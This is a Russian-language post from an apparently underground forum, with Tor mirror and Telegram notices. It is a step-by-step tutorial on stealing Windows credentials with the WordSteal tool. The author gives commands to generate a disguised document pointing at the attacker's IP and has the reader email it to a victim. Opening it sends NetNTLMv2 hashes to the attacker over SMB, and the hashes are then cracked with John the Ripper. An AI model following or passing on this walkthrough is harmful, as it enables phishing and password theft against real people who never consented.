WordSteal - Похищаем пароли Windows

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 694
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Привет! В этой статье мы поговорим как, в принципе, легко и без хлопот заполучить учетные данные пользователя Windows системы.

Для этого предлагаю использовать инструмент, Word Steal который, замечательно с этим справляется.


Этот скрипт создаст POC, который в свою очередь предоставит нам хэши NTLM (NTLM (NT LAN Manager) — является протоколом сетевой аутентификации, разработанным фирмой Microsoft для Windows NT.) с удаленного компьютера. Данные мы будем получать по протоколу SMB, сгенерированный вредоносный файл не кажется таковым с точки зрения рядового пользователя. Итак, приступим, для начала скачиваем Word Steal с репозиториев git.

Атакующая сторона – Kali Linux 2016.2 Rolling.

> git clone
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!



Затем дадим права на исполнение файлу main.py.

> cd WordSteal

> ls –a

> chmod +x main.py


Скачаем любую картинку в формате .jpeg и поместим ее в папку с Word Steal.


Теперь приступим к созданию главного файла, запускаем программу с такими параметрами:

> python main.py 172.16.0.151 (Это адрес атакующего хоста) i.jpeg 1


После окончания работы сценария в папке с Word Steal образуется такой файл:


Его необходимо доставить на целевой хост, для этого идеально подходит почта, отправляем:


Сохраняем файл на целевом хосте и открываем, теперь вернемся к консоли линукс и посмотрим, что происходит там:


На скриншоте видно, что соединение установилось, и мы получили хэши паролей, в папке с Word Steal появился файлик:

Это файл с хэшами, пароли из них будем восстанавливать с помощью john the ripper:

> john passwords_netntlmv2


Как видно, ему удалось восстановить мой пароль, но это лишь в том случае если он есть в базе (словаре) если бы я его туда не добавил, то вероятно ничего бы не произошло. В общем, как-то так, на этом все, спасибо за внимание.
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя